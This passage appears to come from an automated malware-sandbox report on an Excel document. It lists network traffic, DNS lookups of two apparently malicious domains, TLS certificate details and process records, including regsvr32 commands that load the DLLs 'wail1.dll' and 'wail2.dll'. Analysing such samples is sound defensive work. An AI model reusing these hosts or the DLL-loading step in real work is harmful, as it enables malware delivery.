                    Jun 22, 2021 21:09:50.092073917 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:50.138057947 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:50.141763926 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:50.141791105 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:50.141803980 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:50.141819954 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:50.141865969 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:50.141889095 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:50.159957886 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:50.160093069 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:50.202621937 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:50.278028965 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:50.278134108 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:50.319076061 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:50.414375067 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:51.266506910 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:51.266752005 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:51.266930103 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:51.266994953 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:51.267385960 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:51.323441982 CEST443491685.100.155.169192.168.2.22

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jun 22, 2021 21:09:47.215919971 CEST5219753192.168.2.228.8.8.8
                    Jun 22, 2021 21:09:47.278036118 CEST53521978.8.8.8192.168.2.22
                    Jun 22, 2021 21:09:48.171468019 CEST5309953192.168.2.228.8.8.8
                    Jun 22, 2021 21:09:48.224209070 CEST53530998.8.8.8192.168.2.22
                    Jun 22, 2021 21:09:48.230700016 CEST5283853192.168.2.228.8.8.8
                    Jun 22, 2021 21:09:48.282299042 CEST53528388.8.8.8192.168.2.22
                    Jun 22, 2021 21:09:48.841337919 CEST6120053192.168.2.228.8.8.8
                    Jun 22, 2021 21:09:48.904673100 CEST53612008.8.8.8192.168.2.22
                    Jun 22, 2021 21:09:48.912091017 CEST4954853192.168.2.228.8.8.8
                    Jun 22, 2021 21:09:48.979161024 CEST53495488.8.8.8192.168.2.22
                    Jun 22, 2021 21:09:49.944199085 CEST5562753192.168.2.228.8.8.8
                    Jun 22, 2021 21:09:50.025887966 CEST53556278.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Jun 22, 2021 21:09:47.215919971 CEST192.168.2.228.8.8.80xed69Standard query (0)senderoalcielo.comA (IP address)IN (0x0001)
                    Jun 22, 2021 21:09:49.944199085 CEST192.168.2.228.8.8.80x4b51Standard query (0)theottomandoner.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Jun 22, 2021 21:09:47.278036118 CEST8.8.8.8192.168.2.220xed69No error (0)senderoalcielo.com108.167.165.249A (IP address)IN (0x0001)
                    Jun 22, 2021 21:09:50.025887966 CEST8.8.8.8192.168.2.220x4b51No error (0)theottomandoner.com5.100.155.169A (IP address)IN (0x0001)

                    HTTPS Packets

                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                    Jun 22, 2021 21:09:47.646414042 CEST108.167.165.249443192.168.2.2249165CN=senderoalcielo.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun May 30 04:16:52 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sat Aug 28 04:16:52 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                    CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                    CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024
                    Jun 22, 2021 21:09:50.159957886 CEST5.100.155.169443192.168.2.2249168CN=www.theottomandoner.theottomandoner.co.uk CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Jun 21 15:18:17 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sun Sep 19 15:18:16 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                    CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                    CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:21:09:45
                    Start date:22/06/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13f710000
                    File size:27641504 bytes
                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:21:09:53
                    Start date:22/06/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:regsvr32 ..\wail1.dll
                    Imagebase:0xff4b0000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:21:09:54
                    Start date:22/06/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:regsvr32 ..\wail2.dll
                    Imagebase:0xff4b0000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >